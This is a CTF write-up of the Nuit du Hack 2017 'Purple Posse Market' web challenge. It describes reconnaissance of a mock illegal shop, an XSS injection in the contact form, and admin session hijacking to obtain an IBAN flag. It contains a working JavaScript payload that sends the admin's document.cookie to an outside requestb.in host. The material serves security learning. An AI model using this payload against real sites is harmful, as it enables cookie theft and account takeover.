Here we go with another Write-Up ! This one is from the Nuit du Hack 2017 Quals CTF that took place on April 1st 2017 !
The following article describes Purple Posse Market web challenge solution!
We participated with the SwissMadeSecurity and ranked 99th/378 !
Step 1: Reconnaissance
You work for the government in the forensic department, you are investigating on an illegal website which sells illegal drugs and weapons, you need to find a way to get the IBAN of the administrator of the website.
The targeted website was then a drugs and weapons e-commerce website that was looking like it was coming straight from the great age of webdesign revolution back in the 90's :
Navigating through the menu we could find an about page with some informations about order processing and else :
Plus, a simple page containing all products :
When a product got selected, we got redirected to
/product/product_id where we could find detailed informations about the chosen product and a simple form requesting your email address and the product quantity wanted :
We could also notice some products were not available :
Last but not least, we discovered a contact page displaying a message stating that an admin will read our message plus, that it was currently connected :
Juggling around with various URLs, we found an admin panel @
/admin that redirected us to
We then checked the cookies to see if there was something interesting :
We could find an interesting cookie named connect.sid
Considering all this, after a quick and efficient recon we could easily assume that the contact form was vulnerable to XSS (Cross-Site Scripting) that would allow us to steal the admin cookie, log in and (maybe) find his IBAN.
Let's now validate our assumptions !
Step 2: Vulnerability Testing
We started a request.bin and injected the following payload into the contact form :
var i = new Image();i.src="http://requestb.in/1kxo2b11?cookie="+document.cookie;
As expected, we got the admin cookie to be sent right into our bin :
Step 3: Flag !
We then got back to the admin panel, spoofed the cookie with the cool EditThisCookie Chrome Extension and refreshed the page.
We got the desired effect !
We only had to provide the IBAN as is to the scoreboard to complete the challenge.